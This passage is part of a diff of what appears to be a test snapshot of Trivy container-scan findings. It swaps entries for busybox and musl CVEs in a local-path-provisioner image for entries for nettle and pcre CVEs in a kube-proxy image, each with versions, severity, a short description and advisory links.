"https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.24-r10", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-28928", - "installedVersion": "1.1.24-r8", - "packageName": "musl-utils", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "http://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", - "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", - "https://musl.libc.org/releases.html", - "https://ubuntu.com/security/notices/USN-5990-1", - "https://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-28928", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://musl.libc.org/releases.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5990-1", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4933", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r20", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-28831", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-28831", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", - "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", - "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", - "https://security.gentoo.org/glsa/202105-09", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://ubuntu.com/security/notices/USN-5179-2", - "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", ], }, "category": "Vulnerability", - "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: invalid free or segmentation fault via malformed gzip data", + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-28831", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-28831", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", - }, - { - "type": "URL", - "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42378", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42378", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42378", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42378", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42378", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://ubuntu.com/security/notices/USN-4990-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42379", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-14155", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42379", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", + "https://access.redhat.com/security/cve/CVE-2020-14155", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2020-14155.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "https://security.netapp.com/advisory/ntap-20221028-0010/", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", + "name": "pcre: Integer overflow when parsing callout numeric arguments", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42379", + "value": "https://avd.aquasec.com/nvd/cve-2020-14155", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42379", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://access.redhat.com/security/cve/CVE-2020-14155", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42380", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42380", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42380", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42380", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42380", + "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42381", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42381", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42381", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42381", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42382", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42382", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - 